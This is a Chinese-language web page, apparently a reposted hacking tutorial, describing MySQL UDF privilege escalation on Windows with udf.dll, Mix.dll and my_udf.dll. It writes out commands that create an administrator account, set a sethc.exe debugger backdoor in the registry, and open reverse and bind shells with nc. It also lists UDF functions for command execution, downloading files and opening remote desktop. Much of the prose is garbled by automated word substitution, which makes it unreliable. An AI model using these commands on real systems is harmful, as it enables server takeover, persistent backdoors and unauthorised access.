|
|
|
联系客服020-83701501

Mysql udf -Mix 提权

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Mysql udf /Mix 提权

第一部门从Hack58看到了,原作者不知道了,上面的部门也是从网上摘的,如进击了版权请留言。?一、坚守:使用MYSQL的自定义函数坚守(再次声 明:使用MYSQL UDF提权绝非是溢出,而是MYSQL自己的一个坚守),将MYSQL账号转化为零碎system权限。二、适用途合:1.方针零碎是 Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和 delete权限以建立和扔弃函数(MYSQL文档原语)。

3、垄断捐赠:
第一步:将PHP文件上传到方针机上,填入你的MYSQL账号经行邻接。

第二步:邻接告捷后,导出DLL文件,导出时请勿必留神导前程径(突出情况下对任何目次可写,无需思索权限标题),对于MYSQL5.0以上版本,你必须 将DLL导出到方针机器的零碎目次(win 或 system32),否则不才一步独霸中你会看到”No paths allowed for shared library”舛误。

第 3步:垄断SQL语句建立坚守函数。语法:Create Function 函数名(函数名只能为上面列表中的此中之一) returns string soname ‘导出的DLL阶梯’;对于MYSQL5.0以上版本,语句中的DLL不应许带全阶梯,假设你在第二步中已将DLL导出到零碎目次,那末你即可能省略阶梯 而使呼吁正常实验,否则你将会看到”Can’t open shared library”舛误,这时你必须将DLL从新导出到零碎目次。

第四步:粗略建立坚守函数后,你即可能用SQL语句来垄断这些坚守了。语法:select 建立的函数名(‘参数列表’); 每一个函数有不同的参数,你可能垄断select 建立的函数名(‘help’);来失去指定函数的参数列表静态。

四、坚守函数说明:
cmdshell 实验cmd;
downloader 下载者,到网高低载指定文件并糊口到指定目次;
open3389 通用开3389终端做事,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 摆列零碎进程;
KillProcess 截止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,登记,重启;
about 说明与捐赠函数;

写注册表函数.
select regwrite(“HKEY_LOCAL_MACHINE”,”SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe”,”Debugger”,”REG_SZ”,”E:\网站\170stock\admin\include\explorer.exe”);

 
C:Winntudf.dll????2000
C:Windowsudf.dll?2003
现在根蒂上win的做事器就这两个导出UDF.DLL
create?function?cmdshell?returns?string?soname?‘udf.dll’
select?cmdshell(‘net?user?admins?226404553?/add’);
select?cmdshell(‘net?localgroup?administrators?admins?/add’);
select?cmdshell(‘c:3389.exe’);
drop?function?cmdshell;?删除函数
select?cmdshell(‘netstat?-an’);

3:Mix.dll提权
WEBSHELL失去了,找用户和明码也不是什么难事。现在我拿我其它一台机器做树范,已经把PHPSHELL传上来了,突出来讲邻接MYSQL的帐户明码很好找,轻易编辑一个PHP文件,就看到了。
看 到了吧,用户名:root 明码:123456 库名:php 而后怎么办呢?先用SQL Query 创建邻接,哈邻接告捷了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上来先.OK,传好了,Mix.dll用于反弹邻接,My_udf.dll是正向邻接,直接用邻接对方的3306端口而后输出密 码即可失去CMDSHELL。好,未几说了,传上来以后呢就实验以下SQL语句create function Mixconnect returns string soname ‘d:\php\php\Mix.dll’; 来注册函数.

呈现SQL语句告捷实验!

离 拿到CMDSHELL已经不远了,我们先用NC在当地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)此后实验语句:select Mixconnect(‘192.168.1.254′,’1234’); 来激活那个函数,实验告捷,而后看看我们的NC有反响没,告捷失去CMSHELL,无非这时对方的MYSQL已经假死咯,我们要把MYSQL做事进程给 kill掉,而后从新带动MYSQL做事才行,否则操持员创造网站运行不明明,那就。。。。假设该做事器不应许邻接任何内部IP和端口,而他的3306端 口倒是对外开的!这时My_udf.dll就该上场了,垄断动作和Mix异样,邻接MYSQL告捷后实验如下语句:create function my_udfdoor returns string soname ‘D:\php\phpmy_udf.dll’; 实验语句告捷后,而后我们就开始激活这个函数,输出语句:select my_udfdoor (”); 而后用nc邻接3306端口,而后输出fuck 即可能失去一个cmdshell了
提权方面(mix.dll提权)

D:/usr/www/html/mix.dll mysql -h 方针ip -uroot -p . c:mysql.txt select Mixconnect(‘反弹ip’,’端口’); nc -vv -l -p 1983

本文转自h4ckw0rld的百度空间由Internet平安攻防研讨室(www.91ri.org)静态平安小组搜集整顿。

数安新闻+更多

证书相关+更多